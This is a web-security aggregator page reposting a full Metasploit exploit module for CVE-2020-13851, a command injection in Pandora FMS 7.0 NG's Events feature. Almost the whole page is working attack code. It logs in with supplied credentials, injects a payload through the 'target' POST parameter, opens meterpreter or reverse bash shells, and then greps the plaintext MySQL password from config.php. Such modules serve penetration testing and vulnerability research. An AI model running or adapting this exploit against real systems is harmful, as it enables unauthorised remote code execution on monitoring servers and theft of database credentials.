HackDig : Dig high-quality web security articles for hackers

«No Previous
No Next

Pandora FMS 7.0 NG 7XX Remote Command Execution

2020-07-12 06:54
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Pandora FMS Events Remote Command Execution',        'Description' => %q{          This module exploits a vulnerability (CVE-2020-13851) in Pandora          FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps          older versions) in order to execute arbitrary commands.          This module takes advantage of a command injection vulnerability in the          `Events` feature of Pandora FMS. This flaw allows users to execute          arbitrary commands via the `target` parameter in HTTP POST requests to          the `Events` function. After authenticating to the target, the module          attempts to exploit this flaw by issuing such an HTTP POST request,          with the `target` parameter set to contain the payload. If a shell is          obtained, the module will try to obtain the local MySQL database          password via a simple `grep` command on the plaintext          `/var/www/html/pandora_console/include/config.php` file.          Valid credentials for a Pandora FMS account are required. The account          does not need to have admin privileges.          This module has been successfully tested on Pandora 7.0 NG 744 running          on CentOS 7 (the official virtual appliance ISO for this version).        },        'License' => MSF_LICENSE,        'Author' =>          [            'Fernando Catoira', # Discovery            'Julio Sanchez', # Discovery            'Erik Wynter' # @wyntererik - Metasploit          ],        'References' =>          [            ['CVE', '2020-13851'], # RCE via the `events` feature            ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']          ],        'Platform' => ['linux', 'unix'],        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],        'Targets' =>          [            [              'Linux (x86)', {                'Arch' => ARCH_X86,                'Platform' => 'linux',                'DefaultOptions' => {                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'                }              }            ],            [              'Linux (x64)', {                'Arch' => ARCH_X64,                'Platform' => 'linux',                'DefaultOptions' => {                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'                }              }            ],            [              'Linux (cmd)', {                'Arch' => ARCH_CMD,                'Platform' => 'unix',                'DefaultOptions' => {                  'PAYLOAD' => 'cmd/unix/reverse_bash'                }              }            ]          ],        'Privileged' => false,        'DisclosureDate' => '2020-06-04',        'DefaultTarget' => 1      )    )    register_options [      OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])    ]  end  def check    vprint_status('Running check')    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')    unless res      return CheckCode::Unknown('Connection failed.')    end    unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')      return CheckCode::Safe('Target is not a Pandora FMS application.')    end    @cookie = res.get_cookies    html = res.get_html_document    full_version = html.at('div[@id="ver_num"]')    if full_version.blank?      return CheckCode::Detected('Could not determine the Pandora FMS version.')    end    full_version = full_version.text    version = full_version[1..-1].sub('NG', '')    if version.blank?      return CheckCode::Detected('Could not determine the Pandora FMS version.')    end    version = Gem::Version.new version    unless version <= Gem::Version.new('7.0.744')      return CheckCode::Safe("Target is Pandora FMS version #{full_version}.")    end    CheckCode::Appears("Target is Pandora FMS version #{full_version}.")  end  def login(user, pass)    vprint_status "Authenticating as #{user} ..."    res = send_request_cgi!({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php'),      'cookie' => @cookie,      'vars_get' => { 'login' => '1' },      'vars_post' => {        'nick' => user,        'pass' => pass,        'login_button' => 'Login'      }    })    unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')      fail_with Failure::NoAccess, 'Authentication failed'    end    print_good "Authenticated as user #{user}."  end  def on_new_session(client)    super    if target.arch.first == ARCH_CMD      print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')      client.shell_write("grep dbpass include/config.phpn")    else      print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.')    end  end  def execute_command(cmd, _opts = {})    print_status('Executing payload...')    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'ajax.php'),      'cookie' => @cookie,      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',      'Referer' => full_uri('index.php'),      'vars_get' => {        'sec' => 'eventos',        'sec2' => 'operation/events/events'      },      'vars_post' => {        'page' => 'include/ajax/events',        'perform_event_response' => '10000000',        'target' => cmd.to_s,        'response_id' => '1'      }    }, 0) # the server will not send a response, so the module shouldn't wait for one  end  def exploit    login(datastore['USERNAME'], datastore['PASSWORD'])    if target.arch.first == ARCH_CMD      execute_command payload.encoded    else      execute_cmdstager(background: true)    end  endend


Source: 8400700202-BLW/eussi/moc.ytirucesxc

Read:979 | Comments:0 | Tags:No Tag

“Pandora FMS 7.0 NG 7XX Remote Command Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools